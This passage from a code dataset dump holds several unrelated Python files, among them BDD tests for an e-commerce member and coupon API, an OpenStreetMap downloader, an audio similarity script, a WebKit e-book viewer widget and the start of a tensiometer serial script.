Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n tag_ids = []\n data = json.loads(context.text)\n for tag_name in data:\n tag_ids.append(str(MemberTag.objects.get(webapp_id=context.webapp_id, name=tag_name).id))\n args = {\n 'type': 'tag',\n 'checked_ids': '_'.join(tag_ids),\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n@when(u'{webapp_user}给\"{member}\"设等级')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/update_member_tag_or_grade/'\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)\n grade_name = data['member_rank']\n grade_id = MemberGrade.objects.get(webapp_id=context.webapp_id, name=grade_name).id\n\n args = {\n 'type': 'grade',\n 'checked_ids': grade_id,\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n\n@when(u'{webapp_user}给\"{member}\"发优惠券')\ndef step_impl(context, webapp_user, member):\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)[0]\n coupon_rule_name = data['name']\n count = data['count']\n coupon_rule_id = CouponRule.objects.get(owner_id=context.webapp_owner_id, name=coupon_rule_name).id\n\n args = {\n 'coupon_rule_id': coupon_rule_id,\n 'pre_person_count': count,\n 'member_id': json.dumps([member_id])\n }\n\n url = '/mall2/api/issuing_coupons_record/?_method=put'\n response = context.client.post(url, args)\n try:\n bdd_util.assert_api_call_success(response)\n except:\n #用来判断出错的提示信息\n context.response = response\n\n@when(u'{webapp_user}给\"{member}\"加积分')\ndef step_impl(context, webapp_user, member):\n url = '/member/api/integral/'\n query_hex = byte_to_hex(member)\n member_id = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex).id\n data = json.loads(context.text)\n\n args = {\n 'integral': data['integral'],\n 'reason': data['reason'],\n 'member_id': member_id\n }\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n@when(u\"{user}批量发优惠券\")\ndef step_impl(context, user):\n data = json.loads(context.text)[0]\n coupon_rule_name = data.get('coupon_name', '')\n count = data.get('count', 0)\n coupon_rule_id = 0\n if coupon_rule_name:\n coupon_rule_id = CouponRule.objects.get(owner_id=context.webapp_owner_id, name=coupon_rule_name).id\n args = {}\n args['coupon_rule_id'] = coupon_rule_id\n args['pre_person_count'] = count\n\n url = \"/mall2/api/issuing_coupons_record/?_method=put\"\n if data['modification_method'] == '给选中的人发优惠券(已取消关注的除外)':\n # args['member_id'] = json.dumps([m.id for m in Member.objects.filter(id__in=context.member_ids) if m.is_subscribed == 1])\n not_subscribe_member_ids = [m.id for m in Member.objects.filter(id__in=context.member_ids) if m.is_subscribed == 0]\n subscribe_member_ids = context.member_ids\n subscribe_member_ids = [ int(id) for id in subscribe_member_ids]\n for member_id in not_subscribe_member_ids:\n subscribe_member_ids.remove(member_id)\n args['member_id'] = json.dumps(subscribe_member_ids)\n context.member_ids = args['member_id']\n elif data['modification_method'] == '给筛选出来的所有人发优惠券(已取消关注的除外)':\n response = context.client.get('/member/api/member_list/?count_per_page=999999999999'+context.filter_str)\n member_ids = []\n for item in 
json.loads(response.content)['data']['items']:\n member_ids.append(item[\"id\"])\n args['member_id'] = json.dumps([m.id for m in Member.objects.filter(id__in=member_ids) if m.is_subscribed == 1])\n context.member_ids = args['member_id']\n if not coupon_rule_name:\n return\n response = context.client.post(url, args)\n bdd_util.assert_api_call_success(response)\n\n@then(u\"{user}获得发送提示您将为'{member}'发放优惠券\")\ndef step_impl(context, user, member):\n query_hex = byte_to_hex(member)\n member = Member.objects.get(webapp_id=context.webapp_id, username_hexstr=query_hex)\n bdd_util.assert_list([member.id], json.loads(context.member_ids))\n\n@then(u\"{user}获得发送提示您将为'{count}'人发放优惠券\")\ndef step_impl(context, user, count):\n if str(len(json.loads(context.member_ids))) != count:\n raise\n\n@then(u\"{user}获得选择优惠券列表\")\ndef step_impl(context, user):\n expected = json.loads(context.text)\n url = \"/mall2/api/issuing_coupons_filter/?filter_type=coupon&member_count=%s\" % str(len(json.loads(context.member_ids)))\n response = context.client.get(url)\n coupon_rules = json.loads(response.content)['data']['items']\n\n actual = []\n for coupon_rule in coupon_rules:\n rule = {}\n rule[\"name\"] = coupon_rule[\"name\"]\n rule[\"type\"] = \"单品券\" if coupon_rule[\"limit_product\"] else \"全店通用券\"\n rule[\"money\"] = coupon_rule[\"money\"]\n rule[\"limit_counts\"] = \"不限\" if coupon_rule[\"limit_counts\"] == -1 else coupon_rule[\"limit_counts\"]\n rule[\"start_date\"] = coupon_rule[\"start_time\"]\n rule[\"end_date\"] = coupon_rule[\"end_time\"]\n rule[\"is_select\"] = 'true' if coupon_rule[\"has_remained\"] else 'false'\n actual.append(rule)\n\n for item in expected:\n item[\"start_date\"] = \"{} 00:00\".format(bdd_util.get_date_str(item[\"start_date\"]))\n item[\"end_date\"] = \"{} 00:00\".format(bdd_util.get_date_str(item[\"end_date\"]))\n bdd_util.assert_list(actual, expected)\n\n# @Then(u\"{user}能获取会员等级列表\")\n# def step_impl(context, user):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tresponse = context.client.get('/webapp/user_center/grades/')\n# \tmember_grades = response.context['member_grades']\n# \t#context.tc.assertEquals(len(member_grades), len(json_data))\n# \tresponse_data = []\n# \tfor grade in member_grades:\n# \t\tdata_dict = {}\n# \t\tdata_dict['name'] = grade.name\n# \t\tdata_dict['shop_discount'] = str(grade.shop_discount)+\"%\"\n# \t\tif grade.is_auto_upgrade:\n# \t\t\tdata_dict['upgrade'] = u\"自动升级\"\n# \t\telse:\n# \t\t\tdata_dict['upgrade'] = u\"不自动升级\"\n# \t\tresponse_data.append(data_dict)\n\n# \tbdd_util.assert_list(response_data, json_data)\n\n# def _add_member_grade(context, user):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tfor content in json_data:\n# \t\tif content['upgrade'] == u'不自动升级':\n# \t\t\tcontent['is_auto_upgrade'] = 0\n# \t\telse:\n# \t\t\tcontent['is_auto_upgrade'] = 1\n# \t\t\tcontent['upgrade_lower_bound'] = int(content['shop_discount'].replace('%',''))\n# \t\tcontent['shop_discount'] = content['shop_discount'].replace('%','')\n# \t\tif MemberGrade.objects.filter(name=content['name'], webapp_id=user.get_profile().webapp_id).count() == 0:\n# \t\t\tresponse = context.client.post('/webapp/user_center/grade/create/', 
content)\n\n# @When(u"{user}添加会员等级")\n# def step_impl(context, user):\n# \t_add_member_grade(context, user)\n\n# @Given(u"{user}添加会员等级")\n# def step_impl(context, user):\n# \t_add_member_grade(context, user)\n\n# @When(u"{user}更新会员等级{name}")\n# def step_impl(context, user, name):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n# \tif name.startswith("'") and name.endswith("'"):\n# \t\tname = name.replace("'","")\n# \tgrade = MemberGrade.objects.get(webapp_id=user.get_profile().webapp_id, name=name)\n# \tcontext.tc.assertEquals(name, grade.name)\n# \tfor content in json_data:\n# \t\tif content['upgrade'] == u'不自动升级':\n# \t\t\tcontent['is_auto_upgrade'] = 0\n# \t\telse:\n# \t\t\tcontent['is_auto_upgrade'] = 1\n# \t\t\tcontent['upgrade_lower_bound'] = int(content['shop_discount'].replace('%',''))\n# \t\tif content.has_key('integral'):\n# \t\t\tintegral = content['integral']\n# \t\t\tif integral.find('%') > 0:\n# \t\t\t\tintegral = integral.replace('%','')\n# \t\t\tcontent['usable_integral_percentage_in_order'] = integral\n# \t\tcontent['shop_discount'] = content['shop_discount'].replace('%','')\n# \t\tresponse = context.client.post('/webapp/user_center/grade/update/%d/' % grade.id, content)\n\n\n# @When(u"{user}删除会员等级{name}")\n# def step_impl(context, user, name):\n# \tif hasattr(context, 'client'):\n# \t\tcontext.client.logout()\n# \tcontext.client = bdd_util.login(user)\n# \tclient = context.client\n# \tuser = UserFactory(username=user)\n# \tjson_data = json.loads(context.text)\n\n# \tgrade = MemberGrade.objects.get(webapp_id=user.get_profile().webapp_id, name=name)\n# \tcontext.tc.assertEquals(name, grade.name)\n\n# \tresponse = context.client.get('/webapp/user_center/grade/delete/%d/' % grade.id)","repo_name":"chengdg/weizoom","sub_path":"weapp/features/steps/member_grade_steps.py","file_name":"member_grade_steps.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"20283164208","text":"\nclass FloatRange:\n def __init__(self, start, stop, step, precision=8):\n self.value = start\n self.stop = stop\n self.step = step\n self.precision = precision\n\n def __iter__(self):\n return self\n\n def __next__(self):\n value = self.value\n if self.step > 0 and value >= self.stop:\n raise StopIteration()\n if self.step < 0 and value <= self.stop:\n raise StopIteration()\n\n self.value = round(self.value + self.step, self.precision)\n return value\n\n\nif __name__ == "__main__":\n n = 1000\n for i, epsilon in enumerate([1.0 - k / n for k in range(n + 1)]):\n print(i, epsilon)\n\n for i, epsilon in enumerate(FloatRange(1.0, 0.0, -1/n)):\n print(i, epsilon)\n","repo_name":"ManuelWiese/TicTacToe","sub_path":"utils/FloatRange.py","file_name":"FloatRange.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70162023594","text":"# Always start your game with this base.\nimport pygame, sys\nfrom pygame.locals import *\n\npygame.init()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()","repo_name":"StormCode3322/-TowerDefence","sub_path":"core/PyGame_/Game Loop Template.py","file_name":"Game Loop 
Template.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33369131890","text":"\"\"\"Download OpenStreetMap data for each case study according to their\narea of interest using the Overpass API, and pre-process input data\nto shapefiles or GeoTIFF.\n\"\"\"\n\nimport os\n\nimport geopandas as gpd\nimport overpass\nfrom shapely.geometry import Polygon, shape\nfrom tqdm import tqdm\n\nfrom generate_aoi import reproject_geom\nfrom metadata import City, CITIES\n\nOSM_FEATURES = {\n 'highway': 'roads.shp',\n 'building': 'buildings.shp',\n 'leisure': 'leisure.shp',\n 'natural': 'natural.shp',\n 'landuse': 'landuse.shp'\n}\n\n\ndef ways_to_polygons(ways):\n \"\"\"Polygon geometry type doesn't exist in the OSM database.\n This function convert the closed `ways` geometries of a given\n GeoDataFrame to the polygon geometry type.\n \"\"\"\n # Only valid geometries\n ways = ways[ways.is_valid]\n # Only geometries with at least 3 nodes\n ways = ways[ways.geometry.map(\n lambda x: len(x.coords) >= 4\n )]\n ways.geometry = ways.geometry.map(\n lambda x: Polygon(x)\n )\n return ways\n\n\nclass Downloader():\n \"\"\"OpenStreetMap data downloader.\"\"\"\n\n def __init__(self, aoi, epsg, dst_dir):\n \"\"\"Initialize an instance of the overpass API\n for a given case study.\n \"\"\"\n self.aoi = aoi\n self.epsg = epsg\n self.dst_dir = dst_dir\n self.api = overpass.API()\n self.bbox = self.get_bbox()\n\n def get_bbox(self):\n \"\"\"Get bounding box as a formatted string, as expected\n by the overpass API.\n \"\"\"\n aoi = reproject_geom(\n self.aoi, src_epsg=self.epsg, dst_epsg=4326)\n xmin, ymin, xmax, ymax = [round(coord, 3) for coord in aoi.bounds]\n bbox = '({ymin},{xmin},{ymax},{xmax})'\n return bbox.format(xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax)\n\n def get_feature(self, key):\n \"\"\"Get all OSM features which have a non-null value for\n a given key. 
Overpass response is returned as a GeoDataFrame.\n \"\"\"\n query = overpass.WayQuery('[{}]{}'.format(key, self.bbox))\n response = self.api.Get(query)\n features = gpd.GeoDataFrame.from_features(response)\n features.crs = {'init': 'epsg:4326'}\n features = features[['geometry', key]]\n features = features[features.is_valid]\n features = features[features.geometry.type == 'LineString']\n\n # Convert ways to polygons except for roads\n if key != 'highway':\n features = ways_to_polygons(features)\n\n return features\n\n\nif __name__ == '__main__':\n\n progress = tqdm(total=len(CITIES) * len(OSM_FEATURES))\n\n for city_name in CITIES:\n\n city = City(city_name)\n dst_dir = os.path.join(city.intermediary_dir, 'osm')\n os.makedirs(dst_dir, exist_ok=True)\n\n osm = Downloader(\n aoi=shape(city.aoi),\n epsg=city.epsg,\n dst_dir=dst_dir\n )\n\n for key, filename in OSM_FEATURES.items():\n\n features = osm.get_feature(key)\n features = features[features.is_valid]\n features = features.to_crs(city.crs)\n features = features[features.intersects(shape(city.aoi))]\n geoms = features.intersection(shape(city.aoi))\n features = features.assign(geometry=geoms)\n output_f = os.path.join(dst_dir, filename)\n features.to_file(output_f)\n progress.update(1)\n\n progress.close()\n","repo_name":"yannforget/builtup-classification-osm","sub_path":"src/download_osm.py","file_name":"download_osm.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"37147242264","text":"import time\nfrom enum import Enum\nimport numpy as np\nimport librosa\nimport Audio\n\n# wavファイルのリストのパス\nPATH_LIST = \"wav_list.txt\"\n\n# 自動でリサンプリングされるときのサンプリング周波数\nDEFAULT_FS = 44100\n\n# 特徴量の種類\nclass Feature_Types(Enum):\n SPECTRUM = 1\n SPECTRUM_CENTROID = 2\n MFCC = 3\n\n# 使用する特徴量の種類\nfeature_type = Feature_Types.SPECTRUM_CENTROID\n\n# 処理時間計測開始\nstart = time.time()\n\n# (1) wavファイル読み込み\nprint(\"#1 [Wav files read]\")\n\n# wavファイルのパスを読み込み、リストに格納\nwith open(PATH_LIST) as f:\n path_list = [line.strip() for line in f.readlines()] # 改行削除\n\n# 各wavファイルの振幅データ列とサンプリング周波数を取得し、リストに格納\nx_and_fs_list = []\nfor path in path_list:\n x, fs = librosa.load(path, DEFAULT_FS)\n x_and_fs_list.append((x, fs))\n\n# 読み込んだwavファイルのパスを一覧表示\nprint(\"> | {} : {}\".format(\"Index\", \"Path\"))\nfor index in range(len(path_list)):\n print(\"> | {} : {}\".format(index + 1, path_list[index]))\n\nprint(\"\")\n\n# (2) 特徴抽出\nprint(\"#2 [Feature extraction]\")\n\n# 使用する特徴量を表示\nprint(\"> Selected feature type : {}\".format(feature_type.name))\n\n# 使用する特徴量を抽出し、リストに格納\nfeature_list = []\nfor x_and_fs in x_and_fs_list:\n x = x_and_fs[0]\n fs = x_and_fs[1]\n if feature_type == Feature_Types.SPECTRUM:\n feature = np.abs(librosa.stft(x))\n elif feature_type == Feature_Types.SPECTRUM_CENTROID:\n feature = librosa.feature.spectral_centroid(x, fs)\n elif feature_type == Feature_Types.MFCC:\n feature = librosa.feature.mfcc(x, fs)\n feature_list.append(feature)\n\nprint(\"\")\n\n# (3) 類似度計算\nprint(\"#3 [Evaluation]\")\n\n# 比較の基準とする特徴量\nreference_index = 0\nreference_feature = feature_list[reference_index]\nprint(\"> Reference : {} ({})\".format(reference_index + 1, path_list[reference_index]))\n\n# 類似度を計算し、リストに格納\neval_list = []\nfor target_feature in feature_list:\n ac, wp = librosa.core.dtw(reference_feature, target_feature)\n eval = 1 - (ac[-1][-1] / np.array(ac).max())\n eval_list.append(eval)\n\n# 類似度を一覧表示\nprint(\"> | {} , {} : {}\".format(\"Reference\", \"Target\", \"Score\"))\nfor 
target_index in range(len(eval_list)):\n eval = eval_list[target_index]\n print(\"> | {} , {} : {}\".format(reference_index + 1, target_index + 1, round(eval, 4)))\n\nprint(\"\")\n\n# 処理時間計測終了\nend = time.time()\n# 処理時間表示\nprint(\"Total elapsed time : {}[sec]\".format(round(end - start, 4)))\n","repo_name":"Shun40/Wave-Comparator","sub_path":"script/comp.py","file_name":"comp.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32876103219","text":"import random\n#1\n# y=int(input(\"enter year\"));\n# if(y%400==0 or y%4==0):\n# print(\"leap year\")\n\n\n#assignment3\n#1\n# for i in range(10):\n# h=int(input())\n# if(h>40):\n# print(\"bounus\",(h-40)*12)\n# else:\n# print(\"not do over time\");\n#2\n# def fac(n):\n# if(n==1):\n# return 1\n# return n*fac(n-1)\n# print(fac(5))\n#3\n#print(int(input(\"First=\"))**int(input(\"Second=\")))\n#5\n# n=int(input(\"enter\"))\n# sum=0\n# m=n\n# while(n!=0):\n# rem=n%10\n# sum=sum+rem*rem*rem\n# n=n//10\n# if(m==sum):\n# print(\"amstrong\")\n# else:\n# print(\"not\")\n#\ns=21\ni=1\nwhile s>0:\n if(s==1):\n break\n if(i%2!=0):\n while(1):\n try:\n p=int(input(\"enter no 1-4 \"))\n if(p>0 and p<=4 and p<=s):\n s=s-p\n break\n print(\"invailid\")\n except:\n print(\"invalid\")\n else:\n if s==10 :\n g=4\n elif s==9 or s==14 or s==18 or s==20 or s==17:\n g=3\n elif s==8 or s==13 or s==19 :\n g=2\n elif(s<=5):\n g=(s-1)\n else:\n g=(1)\n s-=g\n \n print(\"computer picked \",g)\n print(\"mathch stick= \",s)\n i+=1\nif(s==0):\n if(i%2!=0):\n print(\"win\")\n else:\n print(\"lose\")\nelse:\n if(i%2==0):\n print(\"win\")\n else:\n print(\"lose\")\n#13\n# a='123'\n# for i in a:\n# for j in a:\n# for k in a:\n# if i!=j!=k:\n# print(i,j,k)\n ","repo_name":"Joydeep-Kundu/Python-Projects","sub_path":"assignment/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4980122645","text":"from flask import Blueprint\n\nfrom invenio.base.signals import webcoll_after_webpage_cache_update\nfrom invenio.modules.communities.signals import after_save_collection, \\\n pre_curation, post_curation\n\nfrom .receivers import invalidate_jinja2_cache, pre_curation_reject_listener, \\\n post_curation_reject_listener, make_public_restricted, \\\n update_provisional_query\n\n\nblueprint = Blueprint(\n 'lwdaap_communities',\n __name__,\n static_folder=\"static\",\n template_folder=\"templates\",\n)\n\n\n@blueprint.before_app_first_request\ndef register_receivers():\n \"\"\"\n Setup signal receivers for communities module.\n \"\"\"\n webcoll_after_webpage_cache_update.connect(invalidate_jinja2_cache)\n after_save_collection.connect(invalidate_jinja2_cache)\n after_save_collection.connect(make_public_restricted)\n after_save_collection.connect(update_provisional_query)\n pre_curation.connect(pre_curation_reject_listener)\n post_curation.connect(post_curation_reject_listener)\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/modules/communities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1915566959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 26 09:43:23 2022\n\n@author: sangyoon\n\"\"\"\n\nimport sys \nfrom collections import deque\ninput = sys.stdin.readline \n\n\ndef findPath(start, 
target):\n visited = [False for _ in range(10000)] \n queue = deque([(start, \"\")])\n \n while queue:\n node, p = queue.popleft()\n if node == target:\n return p\n \n newNode = int(str(node)[1:] + str(node)[0])\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"L\"\n queue.append([newNode, newPath])\n \n newNode = int(str(node)[-1] + str(node)[:-1])\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"R\"\n queue.append([newNode, newPath])\n \n newNode = (node * 2) % 10000\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"D\"\n queue.append([newNode, newPath])\n\n if node != 0:\n newNode = node - 1\n else:\n newNode = 9999\n if not visited[newNode]:\n visited[newNode] = True\n newPath = p + \"S\"\n queue.append([newNode, newPath])\n \n\nT = int(input())\n\nfor _ in range(T):\n a, b = map(int, input().split())\n print(findPath(a, b))\n \n ","repo_name":"sangyun0904/BOJ_python_solve","sub_path":"baekjoon/DFS_BFS/baekjoon9019.py","file_name":"baekjoon9019.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30792824650","text":"import logging\n\nimport gi\ngi.require_version('WebKit2', '4.0')\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import GLib\nfrom gi.repository import WebKit2\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\n\nclass _WebView(WebKit2.WebView):\n\n __gsignals__ = {\n 'touch-change-page': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([bool])),\n 'scrolled': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([float])),\n 'scrolled-top': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([])),\n 'scrolled-bottom': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([])),\n 'selection-changed': (GObject.SignalFlags.RUN_FIRST, GObject.TYPE_NONE,\n ([bool])),\n }\n\n def __init__(self, **kwargs):\n cm = WebKit2.UserContentManager()\n\n cm.register_script_message_handler('scrolled');\n cm.connect('script-message-received::scrolled',\n lambda cm, result: self.emit('scrolled',\n result.get_js_value().to_double()))\n\n cm.register_script_message_handler('scrolled_top');\n cm.connect('script-message-received::scrolled_top',\n lambda cm, result: self.emit('scrolled-top'))\n\n cm.register_script_message_handler('scrolled_bottom');\n cm.connect('script-message-received::scrolled_bottom',\n lambda cm, result: self.emit('scrolled-bottom'))\n\n cm.register_script_message_handler('selection_changed');\n cm.connect('script-message-received::selection_changed',\n lambda cm, result: self.emit('selection-changed',\n result.get_js_value().to_boolean()))\n\n cm.add_script(WebKit2.UserScript('''\n window.addEventListener(\"scroll\", function(){\n var handler = window.webkit.messageHandlers.scrolled;\n handler.postMessage(window.scrollY);\n });\n document.addEventListener(\"selectionchange\", function() {\n var handler = window.webkit.messageHandlers.selection_changed;\n handler.postMessage(window.getSelection() != '');\n });\n ''',\n WebKit2.UserContentInjectedFrames.ALL_FRAMES,\n WebKit2.UserScriptInjectionTime.START, None, None))\n\n cm.add_style_sheet(WebKit2.UserStyleSheet('''\n html { margin: 50px; }\n body { overflow: hidden; }\n ''',\n WebKit2.UserContentInjectedFrames.ALL_FRAMES,\n WebKit2.UserStyleLevel.USER, None, None))\n\n WebKit2.WebView.__init__(self, user_content_manager=cm, **kwargs)\n 
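# write JavaScript console messages to stdout, which helps when debugging the injected user scripts\n 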
self.get_settings().set_enable_write_console_messages_to_stdout(True)\n\n def do_context_menu (self, context_menu, event, hit_test_result):\n # nope nope nope nopenopenopenenope\n return True\n\n def setup_touch(self):\n self.get_window().set_events(\n self.get_window().get_events() | Gdk.EventMask.TOUCH_MASK)\n self.connect('event', self.__event_cb)\n\n def __event_cb(self, widget, event):\n if event.type == Gdk.EventType.TOUCH_BEGIN:\n x = event.touch.x\n view_width = widget.get_allocation().width\n if x > view_width * 3 / 4:\n self.emit('touch-change-page', True)\n elif x < view_width * 1 / 4:\n self.emit('touch-change-page', False)\n\n def _execute_script_sync(self, js):\n '''\n This sad function aims to provide synchronous script execution like\n WebKit-1.0's WebView.execute_script() to ease porting.\n '''\n res = [\"0\"]\n\n def callback(self, task, user_data):\n Gtk.main_quit()\n result = self.run_javascript_finish(task)\n if result is not None:\n res[0] = result.get_js_value().to_string()\n\n self.run_javascript(js, None, callback, None)\n Gtk.main()\n return res[0]\n\n def get_page_height(self):\n '''\n Gets height (in pixels) of loaded (X)HTML page.\n This is done via javascript at the moment\n '''\n return int(self._execute_script_sync('''\n (function(){\n if (document.body == null) {\n return 0;\n } else {\n return Math.max(document.body.scrollHeight,\n document.body.offsetHeight,\n document.documentElement.clientHeight,\n document.documentElement.scrollHeight,\n document.documentElement.offsetHeight);\n };\n })()\n '''))\n\n def add_bottom_padding(self, incr):\n '''\n Adds incr pixels of margin to the end of the loaded (X)HTML page.\n '''\n self.run_javascript('document.body.style.marginBottom = \"%dpx\";' % (incr + 50))\n\n def highlight_next_word(self):\n '''\n Highlight next word (for text to speech)\n '''\n self.run_javascript('highLightNextWord();')\n\n def go_to_link(self, id_link):\n self.run_javascript('window.location.href = \"%s\";' % id_link)\n\n def get_vertical_position_element(self, id_link):\n '''\n Get the vertical position of a element, in pixels\n '''\n # remove the first '#' char\n id_link = id_link[1:]\n return int(self._execute_script_sync('''\n (function(id_link){\n var obj = document.getElementById(id_link);\n var top = 0;\n if (obj.offsetParent) {\n while(1) {\n top += obj.offsetTop;\n if (!obj.offsetParent) {\n break;\n };\n obj = obj.offsetParent;\n };\n } else if (obj.y) {\n top += obj.y;\n }\n return top;\n })(\"%s\")\n ''' % id_link))\n\n def scroll_to(self, to):\n '''\n Set the vertical position in a document to a value in pixels.\n '''\n self.run_javascript('window.scrollTo(-1, %d);' % to)\n\n def scroll_by(self, by):\n '''\n Modify the vertical position in a document by a value in pixels.\n '''\n self.run_javascript('''\n (function(by){\n var before = window.scrollY;\n window.scrollBy(0, by);\n if (window.scrollY == before) {\n if (by < 0) {\n var handler = window.webkit.messageHandlers.scrolled_top;\n handler.postMessage(window.scrollY);\n } else if (by > 0) {\n var handler = window.webkit.messageHandlers.scrolled_bottom;\n handler.postMessage(window.scrollY);\n }\n }\n }(%d))\n ''' % by)\n","repo_name":"sugarlabs/read-activity","sub_path":"epubview/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18591939599","text":"# encoding:utf-8\nimport os\nfrom logging import getLogger\n\nimport tweepy\n\nlogger = 
getLogger(\"bot\").getChild(__name__)\n\n\nclass Mytwitterer():\n counter = 0\n\n def __init__(self, CK, CS, AT, AS):\n if not (Mytwitterer.counter):\n self.__CK = CK\n self.__CS = CS\n self.__AT = AT\n self.__AS = AS\n self.get_oauth()\n Mytwitterer.counter += 1\n\n def get_oauth(self):\n auth = tweepy.OAuthHandler(self.__CK, self.__CS)\n auth.set_access_token(self.__AT, self.__AS)\n self.__api = tweepy.API(auth)\n\n @property\n def api(self):\n return self.__api\n\n def search_list(self, id: str) -> list:\n try:\n listlist = []\n for i in self.api.lists_all(id):\n listlist.append(i.name)\n return listlist\n except Exception:\n logger.warning(\"cannot read list from twitter id.\")\n return None\n","repo_name":"NULL-header/twitterer","sub_path":"doc/twitterer.py","file_name":"twitterer.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21914643650","text":"#!/usr/bin/env python\nr\"\"\"\nBands + DOS\n===========\n\nThis example shows how to compute the DOS and plot a\nband structure with DOS using two GSR files.\n\"\"\"\nfrom abipy.abilab import abiopen\nimport abipy.data as abidata\n\n# Open the file with energies computed on a k-path in the BZ\n# and extract the band structure object.\nwith abiopen(abidata.ref_file(\"si_nscf_GSR.nc\")) as nscf_file:\n nscf_ebands = nscf_file.ebands\n\n# Open the file with energies computed with a homogeneous sampling of the BZ\n# and extract the band structure object.\nwith abiopen(abidata.ref_file(\"si_scf_GSR.nc\")) as gs_file:\n gs_ebands = gs_file.ebands\n\n#%%\n# Compute the DOS with the Gaussian method (use default values for\n# the broadening and the step of the linear mesh.\n\nedos = gs_ebands.get_edos()\n\n#%%\n# To plot bands and DOS with matplotlib use:\n\nnscf_ebands.plot_with_edos(edos, with_gaps=True, title=\"Si Electron bands + DOS\")\n\n#%%\n# For the plotly version use:\n\nnscf_ebands.plotly_with_edos(edos, with_gaps=True, title=\"Si Electron bands + DOS\")\n","repo_name":"abinit/abipy","sub_path":"abipy/examples/plot/plot_ebands_edos.py","file_name":"plot_ebands_edos.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"72"} +{"seq_id":"42525318738","text":"#!/usr/bin/env python\n'''\nPython script to interface with an RS485 UGT tensiometer using serial to RS485 converter.\n'''\nfrom io import TextIOWrapper\nimport os\nimport traceback\nimport time\nimport serial\nimport serial.tools.list_ports\n\n# CONFIG\nSAVE_TO_CSV = True\nCSV_FILE_PATH = \"tensiometer.csv\"\n\n# Measurement channel constants\nCHANNEL_SERVICE_1 = 1\nCHANNEL_TEMPERATURE = 2\nCHANNEL_PRESSURE = 3\nCHANNEL_SERVICE_2 = 4\n\nBUS_ADDR_ALL = 0 #Value of bus address for OP for all connected FRTs\n\n## Constants for tensiometer\nBIT_CONVERSION_FACTOR = 16384\nUGT_CONVERSION_FACTOR_32768 = 32768\nUGT_CONVERSION_FACTOR_31 = 31\n\n\ndef open_csv(csv_file_name):\n '''\n Create csv file and add headers\n '''\n # Check if file exist to add column headings\n if not os.path.isfile(csv_file_name):\n csv_fid = open(csv_file_name, 'w', encoding=\"utf-8\") # Open file for writing\n csv_fid.write(\"Timestamp,Temperature (Digital),Pressure (Digital),Temperature (C),Pressure (kPa),Suction (kPa)\\n\") # Allocate column names\n else:\n csv_fid = open(csv_file_name, 'a', encoding=\"utf-8\") # Open file for appending\n return csv_fid\n\n\ndef get_com_ports_list():\n '''\n Gets a list of comm ports\n '''\n 
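# each comports() entry unpacks as (device, description, hwid), the shape print_ports_list expects\n 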
